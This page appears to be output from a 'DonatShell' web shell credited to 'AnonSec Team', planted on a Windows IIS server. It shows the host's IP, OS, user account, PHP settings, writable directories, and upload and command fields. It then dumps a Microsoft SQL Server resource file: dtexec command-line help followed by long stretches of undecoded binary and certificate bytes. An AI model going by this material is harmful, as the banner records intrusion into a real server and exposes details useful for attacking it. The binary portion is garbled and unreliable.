DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files (x86)/Microsoft SQL Server/110/DTS/Binn/Resources/1033/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Program Files (x86)/Microsoft SQL Server/110/DTS/Binn/Resources/1033/DTEParse.rll
MZ@	!L!This program cannot be run in DOS mode.

$Uu]333c3c3Rich3PEL5O!

"@(X<.rsrc(@@0p	
0H`x									 tx,%'.Z3cԖ̛Z!Option index %1!d! is not valid.
%Missing argument for option "%1!s!".
2Argument "%1!s!" for option "%2!s!" is not valid.
+Option "%1!s!" can only be specified once.
Option %1!d! is not valid.
OAn out of memory error occurred while saving.  Option: %1!s!, Argument: %2!s!.
7A type mismatch occurred in an argument set operation.
YComparison of argument "%1!s!" failed against a previously set value for option "%2!s!".
CAn unknown error occurred for option "%1!s!" with argument "%2!s!"
eA command file option was encountered while in a command file.
Nested command files are not allowed.
eThe DTS option cannot be specified with the File, SQL, Project, ISServer, User, or Password options.
mThe File option cannot be specified with the DTS, SQL, Server, Project, ISServer, User, or Password options.
TThe SQL option cannot be specified with the DTS, File, ISServer or Project options.
<The Password option must be specified with the User option.
YThe SQL option must be specified if the User, Password, or Server options are specified.
JAt least one of the DTS, SQL, ISServer or File options must be specified.
Option "%1!s!" is not valid.
5Reporting option V or N can only be specified alone.
HReporting options E, W, I, C, D, and P can only be specified once each.
XAn invalid reporting option was specified.
Only E, W, I, C, D, P, V, and N are allowed.
JAn invalid console logging option was specified.  Only I or E is allowed.
;Console logging option "E" must have a list of exclusions.
;Console logging option "I" must have a list of inclusions.
$Could not open command file "%1!s!"
*Out of memory while saving Option: %1!s!.
AConsole logging display options can only be specified once each.
PAfAn invalid console logging display option was specified.
Only N, C, O, S, G, X, M, and T are allowed.
DAn out of memory condition occurred while parsing the command file.
,The argument "%1!s!" has mismatched quotes.
Enter decryption password: Enter SQL Server password: TThe Project option cannot be specified with the SQL, DTS, ISServer or File options.
>The Package option must be specified with the Project option.
eThe ISServer option cannot be specified with the DTS, SQL, File, Project, User, or Password options.
HThe EnvReference option can only be specified with the ISServer option.
EThe Parameter option can only be specified with the ISServer option.
9The Validate option cannot be used with ISServer option.
PA5
Usage: DTExec /option [value] [/option [value]] ...
XOptions are case-insensitive.
A hyphen (-) may be used in place of a forward slash (/).
/Ca[llerInfo]
/CheckF[ile]        [Filespec]
5/Checkp[ointing]    [{On | Off}] (On is the default)
/Com[mandFile]      Filespec
/Conf[igFile]       Filespec
./Conn[ection]       IDOrName;ConnectionString
PA/Cons[oleLog]       [[DispOpts];[{E | I};List]]
                    DispOpts = any one or more of N, C, O, S, G, X, M, or T.
                    List = {EventName | SrcName | SrcGuid}[;List]
/De[crypt]          Password
 /DT[S]              PackagePath
-/Dump               code[;code[;code[;...]]]
/DumpOnErr[or]
=/Env[Reference]     id of an Environment in the SSIS catalog
/F[ile]             Filespec
/H[elp]             [Option]
A/IS[Server]         Full path to the package in the SSIS catalog
1/L[ogger]           ClassIDOrProgID;ConfigString
*/M[axConcurrent]    ConcurrentExecutables
9/Pack[age]          Package to run inside of the project
e/Par[ameter]        [$Package::|$Project::|$ServerOption::]parameter_name[(data_type)];literal_value
/P[assword]         Password
(/Proj[ect]          Project file to use
/Rem[ark]           [Text]
PA/Rep[orting]        Level[;EventGUIDOrName[;EventGUIDOrName[...]]
                    Level = N or V or any one or more of E, W, I, C, D, or P.
I/Res[tart]          [{Deny | Force | IfPossible}] (Force is the default)
'/Set                PropertyPath;Value
#/Ser[ver]           ServerInstance
 /SQ[L]              PackagePath
/Su[m]
/U[ser]             User name
/Va[lidate]
*/VerifyB[uild]      Major[;Minor[;Build]]
/VerifyP[ackageid]  PackageID
/VerifyS[igned]
/VerifyV[ersionid]  VersionID
/VLog               [Filespec]
/W[arnAsError]
/X86
PA&HIdCheckF[ile] filespec



Optional.  Name the checkpoint file when checkpointing is turned on.  The

filespec argument specifies the file name and path of the checkpoint file.

Checkp[ointing] {on | off}



Optional. Turn checkpointing on or off.  Default is on if neither on nor off is

specified.

,Com[mandFile] filespec



Optional. Loads a text file that contains additional dtexec command options, 

prior to package execution. The filespec argument specifies the file name and 

path of the command file that you want to associate with the execution of the 

package.

tConf[igFile] filespec



Optional. Sets a run-time configuration that is different from the 

configuration that was specified at design time. You can store dtexec 

configuration settings in an XML configuration file and then load the settings 

by means of the ConfigFile option prior to package execution.

Conn[ection] id_or_name;connection_string



Optional. Sets the connection string property of a ConnectionManager stored 

within a SSIS package. The ConnectionManager is identified either by its name

or its ID.

LCons[oleLog] [[DisplayOptions];{E | I};src_name_or_guid[src_name_or_guid[...]]]



Optional. Displays all available log entries to the console during package 

execution, if no arguments are specified. If you omit this option, no log 

entries are displayed to the console during package execution. 



Valid display options are:

o N (Name).           Display the name.

o C (Computer).       Display the computer.

o O {Operator).       Display the user.

o S (Source Name).    Display the source name.

o G (Source GUID).    Display the source GUID.

o X (eXecution GUID). Display the execution GUID.

o M (Message).        Display the message text.

o T (Time).           Display the date and time.



Valid arguments are: 

o I (Inclusion List). Only the source names or GUIDs that are specified are 

                      logged. 

o E (Exclusion List). The source names or GUIDs that are specified are not 

                      logged. 



If you use multiple ConsoleLog options on the same command prompt, 

they interact as follows: 

o Their order of appearance has no effect. 

o If no inclusion lists are present on the command line, exclusion lists are 

  applied against all types of log entries. 

o If any inclusion lists are present on the command line, exclusion lists are 

  applied against the union of all inclusion lists.

o The following table lists of all available source names and their 

  associated GUIDs: 

TDT[S] package



Loads a package using the SSIS Service. The package argument specifies the

folder and name of the package to retrieve.



However, you can use the DTS option in conjunction with the Server option.



If you omit the Server option, the default local instance of the SSIS Service

is assumed.



If you use the DTS option in conjunction with any of the following options, 

dtexec fails: 

o File 

o SQL

$F[ile] filespec



Loads a package that is saved in the file system as a .dtsx file. The filespec 

argument specifies the path and file name of the package. You can specify the 

path as either a Universal Naming Convention (UNC) path or local path.



If you use the File option in conjunction with any of the following options, 

dtexec fails: 

o DTS 

o SQL 

o User 

o Password 

o Server 

H[elp] [option_name]



Optional. Displays a list of options and their associated arguments unless the 

option_name argument is specified. 



If you specify an option_name argument, dtexec displays the command line help

for the specified option.

4L[ogger] classid_or_progid;config_string



Optional. Associates a logger with the execution of a SSIS package. 

The following lists available loggers:





Name              ProgID/ClassID 

Text file         DTS.LogProviderTextFile.1

                  {0A039101-ACC1-4E06-943F-279948323883}

                  

SQL Profiler      DTS.LogProviderSQLProfiler.1

                  {E93F6300-AE0C-4916-A7BF-A8D0CE12C77A}

                  

SQL Server        DTS.LogProviderSQLServer.1

                  {94150B25-6AEB-4C0D-996D-D37D1C4FDEDA}

                  

Window Event Log  DTS.LogProviderEventLog.1

                  {071CC8EB-C343-4CFF-8D58-564B92FCA3CF}

                  

XML file          DTS.LogProviderXMLFile.1

                  {440945A4-2A22-4F19-B577-EAF5FDDC5F7A}

M[axConcurrent] concurrent_executables



Optional. Sets the number of threads that process executables in a single 

package execution instance. By default, the number of processors plus 2 threads

are allocated for package execution.

HP[assword] password



Optional. Allows the retrieval of a package that is protected by SQL Server 

Authentication. This option is used in conjunction with the SQL and User 

options. However, you can use the Password option only if you use the User 

option. If the Password option is omitted and the User option is used, a blank 

password is used.



* Security Note: When possible, use Windows Authentication.

Rem comment



Optional. Places comments on the command prompt or in command files. The 

comment argument is optional. The value of comment is a string that either must

be enclosed in quotation marks or contains no white space.

<Rep[orting] level[;eventguid_or_name[;eventguid_or_name[;...]]



Optional. The level may be N or V or any combination of E, W, I, C, D, and P.

The optional list of event guids or names is a list of items to be excluded

from the output when the message matches the level.  If the level is N then the

list contains items to be displayed even though reporting is off.  If reporting

is not specified then the default is EWP.



Level

N - Display nothing

E - Display error messages

W - Display warning messages

I - Display information messages

C - Display custom messages

D - Display DataFlow messages

P - Display progress messages

V - Display all messages

Res[tart] {deny | force | ifPossible} 



Optional. By default, Restart is set to force.

Set property_path;value



Optional. Overrides the configuration of a variable, property, container, 

log provider, foreach enumerator, or connection within a package. When 

specified, the /SET option sets the specified propertypath to the value given.

Multiple /SET options can be specified. When using with /ISSERVER the 

$Sensitive:: prefix can optionally be specified to indicate the property

should be considered sensitive  on the server.



The following is an example of executing a package that is provided a variable

with a value.



dtexec /f mypackage.dtsx /set \package.variables[myvariable].Value;myvalue 

Ser[ver] server_name



Optional. Specifies the name of SQL Server instance from which to retrieve the 

package. If you omit this option, package execution is attempted against the

local default instance of SQL Server.

tSQ[L] package



Loads a package that is stored in SQL Server. The package argument specifies

the folder and name of the package to retrieve.



However, you can use the SQL option in conjunction with options User, Password,

and Server. If you omit the User option, Windows Authentication is used to 

access the package. If it is present, the User login name specified is 

associated with SQL Server Authentication.



You can use the Password option only in conjunction with the User option.

If you use the Password option, dtexec accesses the package with the user name

and password information that you provide. If you omit the Password option, a 

blank password is used.



* Security Note: When possible, use Windows Authentication.





If you omit the Server option, the default local instance of SQL Server is 

assumed.



If you use the SQL option in conjunction with any of the following options, 

dtexec fails: 

o DTS 

o File 

U[ser] user_name



Optional. Allows the retrieval of a package that is protected by SQL Server 

Authentication. You use this option in conjunction with the SQL option. 



* Security Note: When possible, use Windows Authentication.

Va[lidate] 



Optional. Stops the execution of the package after the validate phase, without

actually running the package. If you use the WarnAsError option elsewhere on 

the command line, dtexec fails if a warning occurs during validation. 

VerifyB[uild] major[;minor[build]]



Optional. Verifies the build number of a package against the build numbers 

specified in the major, minor, and build arguments. If used, and a mismatch 

occurs, the package will not execute.



You must use an argument with this option. The argument can have one of three 

forms: 

o major 

o major;minor 

o major;minor;build 

,VerifyP[ackageID] package_id



Optional. Verifies the ID of the package to be executed against the value 

specified in the packageID argument.

VerifyS[igned] 



Optional. Causes the package to fail if it is not signed.

<VerifyV[ersionID] version_id



Optional. Verifies the version GUID of a package to be executed against the 

value specified in the versionID argument. 

W[arnAsError] 



Optional. Causes the package to fail if a warning occurs during validation. 

If no warnings occur during validation and the Validate option is not 

specified, the package is executed. 

XSu[m]



Optional. Causes reported progress to show the total number of rows received by

a component rather than number of rows currently being sent to the component.

De[crypt] password



Optional. Sets the decryption password used when loading a package with

password encryption.

Dump code[;code[;code[;...]]]



Optional. Specify a list of SSIS event codes that will trigger the system to

create debug dump files during package execution. The event code can be an

error code, warning code, or information code.

DumpOnErr[or]



Optional. Create debug dump files when any error occurs during package

execution.

$VLog [Filespec]



Optional. Writes all Integration Services package events to the log providers

that were enabled when the package was designed. To have Integration Services

enable a log provider for text files and write log events to a specified text

file, include a path and file name as the Filespec parameter. If you do not

include the Filespec parameter, Integration Services will not enable a log

provider for text files and will write log events only to the log providers

enabled for the package at design time.

X86 



Optional.  Ignored when running dtexec from the command line.  Use this

option when scheduling a job with SQL Agent to specify that SQL Agent

should use the 32-bit dtexec runtime to execute the specified package.

LProj[ect] project file path



Optional. Use this option to specify the project from which 

a package can be retrieved. It is supposed to be used with /Package.

(Pack[age] package name



Optional. Use this option to specify the package to be used in an execution.

It is supposed to be used with /Project

IS[Server] package path



Optional. Ignored when running dtexec from the command line. Use this option when 

scheduling a job with SQL Agent to specify the SQL Server instance from which 

to retrieve the package to be used in an execution.

Env[Reference] enviroment reference



Optional. Ignored when running dtexec from the command line. Use this option when 

scheduling a job with SQL Agent to specify the environment reference that is used by an execution.

xCa[llerInfo]



Optional. Ignored when running dtexec from the command line. Use this option when 

scheduling a job with SQL Agent to specify additional information for an execution.

PPar[ameter] [$Package::|$Project::|$ServerOption::]parameter_name[(data_type)];literal_value



Optional. Provides a literal value for a parameter. Multiple /Parameter options

can be specified. The $Package::, $Project::, or $ServerOption:: name prefix 

can be specified to indicate the type of parameter.  The default parameter type

is package. For non-string parameter values the data type should be specified

in parenthesis following the parameter name.



The following is an example of executing a package that is provided a the value

myvalue to for the project parameter myparam and the integer value 12 for the

package parameter anotherparam.



dtexec /isserver "\SSISDB\MyFolder\MyProject\MyPackage.dtsx" /server "." /parameter $Project::myparam;myvalue /parameter anotherparam(int32);12

DTExec is the command line package executer.  To get more information on its

usage specify the /help option on the command line.  To get detailed help about

an option specify /help option on the command line.

4VS_VERSION_INFOn<4<4?VStringFileInfo2040904B02
PlatformNT INTEL X86ILegalTrademarksMicrosoft SQL Server is a registered trademark of Microsoft Corporation. CommentsSQL&GoldenBitsTrueLCompanyNameMicrosoft Corporation@FileDescriptionData Transformation Services Execution Utility Parser Resources|.FileVersion2011.0110.2100.060 ((SQL11_RTM).120210-1846 )2	InternalNameDTEParsen%LegalCopyrightMicrosoft Corp. All rights reserved.B
OriginalFilenameDTEParse.RLLJProductNameMicrosoft SQL Server>
ProductVersion11.0.2100.60DVarFileInfo$Translation	<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXX<0<H	*H
<90<510	+0L
+7>0<0
+70	0!0	+<xPs2I?O00
aj0
	*H
0y10	UUS10U
Washington10URedmond10U
Microsoft Corporation1#0!UMicrosoft Code Signing PCA0
111101223917Z
130201224917Z010	UUS10U
Washington10URedmond10U
Microsoft Corporation1
0UMOPR10UMicrosoft Corporation0"0
	*H
0
é|#1%uyϓKa%wKZmI17t`N%X N-:e.[]u4P!}9D#fe 6`*dȇE(WY&Jl)2?%
oj-:mf16p@v.G+e+_hExkP5[qa! EeI~7Z߸v Q*P:c܁G00U%0
+0UqÏv,
J(0U0U#0WEt]CT-2H0VUO0M0KIGEhttp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl0Z+N0L0J+0>http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt0
	*H
yiȏk`|>8Rϙ-=au8NY?C|Sb֨vuYl?/~9T'X5aymQWcrf9*35
^15E
]Ǘ*:IHE26m	nvUU4y]n̗h}i{U}M0b{젒*W)HͶ!	b
5_kԱwRw?lV\6N^z  1ynr_0W|UplxC 500
a0
	*H
0w10	UUS10U
Washington10URedmond10U
Microsoft Corporation1!0UMicrosoft Time-Stamp PCA0
110725204219Z
121025204219Z010	UUS10U
Washington10URedmond10U
Microsoft Corporation1
0UMOPR1'0%UnCipher DSE ESN:9E78-864B-039D1%0#UMicrosoft Time-Stamp Service0"0
	*H
0
;SDzMVqSw7~>Sѱ"unav;
CSb83+={EW c4bFٞ9Uw5\HOCX8lKzn`[?:? }m/X}ʊ89h-X#*Z їE7
|ӶSx#!bZjipS4%1UL5[ɫS)_,%d'u	00Uy#
U,h)bg68Z0U#0#4RFp
@v+50TUM0K0IGEChttp://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl0X+L0J0H+0<http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt0U%0
+0
	*H
Gv[1o<zl~P,DVϽ!dmaCDﭶ\mKC'axT|
tĪ-P}}N'(߱"yam̄ߣ[Tbl'cK߅eiSqd&f\b=KB
8&Z*Kj8sΌP$?xT]%fA(IĴRdMK)?<3ʿ"`\;
m<:ObAv00
ah40
	*H
0_10
	&,dcom10
	&,d	microsoft1-0+U$Microsoft Root Certificate Authority0
070403125309Z
210403130309Z0w10	UUS10U
Washington10URedmond10U
Microsoft Corporation1!0UMicrosoft Time-Stamp PCA0"0
	*H
0
lH*|k.řQ#PN$ѧLt0 TIB\0&k{3$g,{N#SʍE	^аBlg(FS(F.'OUR,j0nY0~֗!~SmREHJGf')fJG	UxP0F#F-TxA1w̛;a
"KT 00U00U#4RFp
@v+50U0	+70U#0`@V'%*
SY䤡ca0_10
	&,dcom10
	&,d	microsoft1-0+U$Microsoft Root Certificate AuthorityyJLsX.e0PUI0G0ECA?http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0T+H0F0D+08http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0U%0
+0
	*H
\D6鴭wyQM.tq[mξ{.mbWN Pz@WXx;⾏
ȍHSOjՀ/*$"px.
pNk
r9g-Qb\? ?21Jv1=+rp=

a׸N5+^}B{Sr!0ʻxe\[
<fX-/QVpl9Lyzb))4wb=m,C}㤨t5Nq#&v<RqZFCMgȟBy!0fB^Ȟ"!C+H,2L&*H$_ZVޙ:o'tv!'Tj=vanGo2lQȌ#fd=-Y!嵰cxTA.Pxuْu"/2n[%!OɚIeo}in꧗1)[\M/?.Uk00i
a'0
	*H
0_10
	&,dcom10
	&,d	microsoft1-0+U$Microsoft Root Certificate Authority0
060125232232Z
170125233232Z0y10	UUS10U
Washington10URedmond10U
Microsoft Corporation1#0!UMicrosoft Code Signing PCA0"0
	*H
0
߅7Vf6N
6#X:
$^>3kir|_%D5(Րap-o,ݹ0qxȩg
z	¼W?i00&Ԟ{	IERu{".VϩN<
:ŭj"#l'~2y%B❅WY/-&)ųׅ`Z{{^4Km'Тѐ}|4lJDyh("
,Ha#00	+70UWEt]CT-2H0U0U00U#0`@V'%*
SY䤡ca0_10
	&,dcom10
	&,d	microsoft1-0+U$Microsoft Root Certificate AuthorityyJLsX.e0PUI0G0ECA?http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0T+H0F0D+08http://www.microsoft.com/pki/certs/MicrosoftRootCert.crt0vU o0m0k	+7/0^0\+0PNCopyright  2006 Microsoft Corporation.0U%0
+0
	*H
0 b9&a=ܬƙІ.2e^">ֆ趟ʋ;u>LdtIglfF:FBȑ7$AwO_R/>V[uSTie$%MPO"Y"tE{YL`xѺk~D@ҽKnU8HUz }۔/{kdO,4)]8/ V1i΅
֮8nOL))
\\V#W
&6Do阵sx<t^l!g엝r4/j9-[М|St9J9}BJ;7=J{'NJT8j#7jHB
I$.oEM`Y؀`4{ \	
(M~ex1_fB Ee2.Mkޤ
ؘY ,Rid࣫|aCe6U+g,M0L1%0%00y10	UUS10U
Washington10URedmond10U
Microsoft Corporation1#0!UMicrosoft Code Signing PCA
aj0	+0	*H
	1
+70
+710
+70#	*H
	1ήG_<TkC{r9oK0R
+71D0B SQL Server 2012http://www.microsoft.com/sql0
	*H
@Z;\ߘ<;Nq>E絒+/>Ej.;Q.@YMŜ0<Ӳ͖vM|/<s!tAwm2iwْ`qzM!L{1f`_ʜ܈7iV=D	3btcdK<`nhp$:)ڭsI`jzp9keR#u0	*H
	1
000w10	UUS10U
Washington10URedmond10U
Microsoft Corporation1!0UMicrosoft Time-Stamp PCA
a0+]0	*H
	1	*H
0	*H
	1
120211165939Z0#	*H
	1 StLUޑɁnեj0
	*H
oCb<%.C'z/E>O̫z@@WjRv[+IcoV`\&}F-ɫhYs7:%5쁩q>RĎ!.6-񒾌XpdW]D/'{=NqDcc6cޡZKi43ƛ ͊)|]8Z+rIoHPQn
	<YLP{f~()&3f֋A!<yE0!T
+71!D0!@	*H
!10!-10
	`He0\
+7N0L0
+70	010
	`He [6{qy2]FWe*')00
aIU0
	*H
0~10	UUS10U
Washington10URedmond10U
Microsoft Corporation1(0&UMicrosoft Code Signing PCA 20100
111010204524Z
130110205524Z010	UUS10U
Washington10URedmond10U
Microsoft Corporation1
0UMOPR10UMicrosoft Corporation0"0
	*H
0
Ϥ01QU4`E)_++rC\;*Yqrx ,8[b}ԯaD9βTK&DOW#Jjة6w4O{_u9}aRƲ~:xȔ=G'rpW0'ca(лbd@"+^wrN|U~\~@6tdW$XkUgZ.i;%00U%0
+0Ui1bqXxa0U#0_{"XrN!t#20VUO0M0KIGEhttp://crl.microsoft.com/pki/crl/products/MicCodSigPCA_2010-07-06.crl0Z+N0L0J+0>http://www.microsoft.com/pki/certs/MicCodSigPCA_2010-07-06.crt0U00
	*H
x[Zm#}u	j'EӒNħe݅JSxA
0 T'Yh8.?iLLx
P:M?+R=Mk&Z\j@K1(|Tp?vY0nm.$X9MRlj[AS{T1
DA~Ri?c2KW8X—@c-mk|+;B+9@"QpA
`&ǩc؅0p0X
aRL0
	*H
010	UUS10U
Washington10URedmond10U
Microsoft Corporation1200U)Microsoft Root Certificate Authority 20100
100706204017Z
250706205017Z0~10	UUS10U
Washington10URedmond10U
Microsoft Corporation1(0&UMicrosoft Code Signing PCA 20100"0
	*H
0
dPyg	LVhDXOv|mE9eҏDe,U}.+A+KnILk‰q͵K̈k:&?4W]I*.ՅY?+t+;FFIfTUbWrg% 4]^(ղcӲȊ&
Y5LR[HwօGj-\`ƴ*[#_Eo73jMjfcx0ϕ00	+70U_{"XrN!t#20	+7
SubCA0U0U00U#0Vˏ\bh=[Κ0VUO0M0KIGEhttp://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0>http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0U 00	+7.00=+1http://www.microsoft.com/PKI/docs/CPS/default.htm0@+042 Legal_Policy_Statement. 0
	*H
tWO){xP"	4*,Ͽ4ہ5oywNaZ#bQEg?<09@!)奡i"tGCS0i% moar,iv=Qۦ9H7amS˧a¿⃫k}(QJQlȷJi~IprGc֢DciFz?!{#-A˿Lﱜ"KInv[Sy=s5<TRGjҎڙg^27uZW¿
-'ӵ^i$gsMOVzRMwOB	
v#Vx"&6ʱnG3bɑ3_q@e"B!%-`7A*a<h`RG@w>SP8f3'9x6N_=GSa=*ג,7Z>@B1V$]Qjy{%qDj#u1000~10	UUS10U
Washington10URedmond10U
Microsoft Corporation1(0&UMicrosoft Code Signing PCA 2010
aIU0
	`He0
*H
	10	*H
	1
+70
+710
+70/	*H
	1" L䬎j

+2/YP3P%˙u0R
+71D0B SQL Server 2012http://www.microsoft.com/sql0
	*H
|!4!.v]!EHrs we>&n>~UF
T10.gw훬q\sP-lGrYcdah*~Q%Qز7fV$ͤn%+
S^
;%Y@Ҥ
IͱH=J_]飾?{aCo	D		;ߋ~فK;S4ޚOG- Сm~C0
+710	*H
010	+0**H
	0
+Y
0!0	+k

+mhrUʩO1&",^20120211165941.233Z0010	UUS10U
Washington10URedmond10U
Microsoft Corporation1
0UMOPR1'0%UnCipher DSE ESN:936C-7AEE-74AE1%0#UMicrosoft Time-Stamp Service0q0Y
a	*0
	*H
010	UUS10U
Washington10URedmond10U
Microsoft Corporation1200U)Microsoft Root Certificate Authority 20100
100701213655Z
250701214655Z0|10	UUS10U
Washington10URedmond10U
Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100"0
	*H
0

w: iktTե
|hK,_av>f+[S'1A	|a0Y0D`TCM8Bݓs0W&E
GͿ$`2X`FXG2tag_TϓLĦ]an(aF'$gr!KdPb]w=WuBM@Q>gfD~Knʱz*
1N5x</Dd 	xD]^O"M00	+70Uc:\1C{|F3hZmU0	+7
SubCA0U0U00U#0Vˏ\bh=[Κ0VUO0M0KIGEhttp://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0>http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt0U 00	+7.00=+1http://www.microsoft.com/PKI/docs/CPS/default.htm0@+042 Legal_Policy_Statement. 0
	*H
Q
?q=!o1Wm0fjxǨ%kTW+QDS`v@@A\\^5$VKtBȯ7}Z?yJR8/ye٩kzoK0D$"<Y)p2J'U/3b_W@ΙfjbJ&9Jqc{!mÜ<}jxm8ؔƥ
B"8 %d~cY%z.9Wvqa˚Gͧ};q	]t"aڰPo1:eGxHr~akow˧	9؂r*T9[
Uzs;-3.)/T'!ȬN(ۖBAM*f0ӻt2Kc{/!YD<PqסUiW0M
]O8/X.
P5	'ճ~56_tI00
aN	0
	*H
0|10	UUS10U
Washington10URedmond10U
Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100
111215031031Z
130315032031Z010	UUS10U
Washington10URedmond10U
Microsoft Corporation1
0UMOPR1'0%UnCipher DSE ESN:936C-7AEE-74AE1%0#UMicrosoft Time-Stamp Service0"0
	*H
0
ؾc0HS<!%5x~B ?+#^ˀÄRU9U?T<>ǘP5Gj+ἃdPeMsؾHu84YR䇉
;G+	TH9Hkd~"AH6/S4J&)IaʱX&_"
wguaS+ƶwp/%B:2AOTlE{@PFWƀb00U?9v5#[LW70U#0c:\1C{|F3hZmU0VUO0M0KIGEhttp://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl0Z+N0L0J+0>http://www.microsoft.com/pki/certs/MicTimStaPCA_2010-07-01.crt0U00U%0
+0
	*H
O)KSQ\\s*8hO9KC54Ud"
`΃;@|D[ifa?ann!ҲgR*ru1>QI̐Ԉ!kbب"pQØ9X=pD.mLsT&cYNOg~u:TePbɂ%=e?cbӉ_ɩVK@TA%X,O㣏)}Wrxnj] PLv0^0㡁010	UUS10U
Washington10URedmond10U
Microsoft Corporation1
0UMOPR1'0%UnCipher DSE ESN:936C-7AEE-74AE1%0#UMicrosoft Time-Stamp Service%
0	+^$3+b xc
ցs적0010	UUS10U
Washington10URedmond10U
Microsoft Corporation1
0UMOPR1'0%UnCipher NTS ESN:B027-C6F8-1D881+0)U"Microsoft Time Source Master Clock0
	*H
ϣ0"20120211112939Z20120212112939Z0t0:
+Y
1,0*0
ϣ000
!#06
+Y
1(0&0
+Y

0 
0 0
	*H
*Aܚ}kpEK)pin_f\P0a:>uѣ{77yX&2pR"V>zi]s^FxB>c3n*dQ9ΤMpEh	Dh-ak8I65΢kvg};du;OJ-(N!vm
cPU\d6F!nkBD$>r;,!D]_H7ı!^"z#|RS5]1000|10	UUS10U
Washington10URedmond10U
Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 2010
aN	0	+0	*H
	1
*H
	0#	*H
	1OpIr8\t0*H
	1000^$3+b xc
ցs00~0|10	UUS10U
Washington10URedmond10U
Microsoft Corporation1&0$UMicrosoft Time-Stamp PCA 2010
aN	0ZǕ.
Ԥ@0
	*H
+~d*@O[_Y)!AvZ$¾X捇
umѱ}+G%ܟBտA;n^8un2?=z#%#D2}<@*gu`O;mQBA^

;6LwOS5gU]/a5>s^~m]'Y#l.BOtOP"ePw|:'5&3rWU	^S{W

Anon7 - 2022
AnonSec Team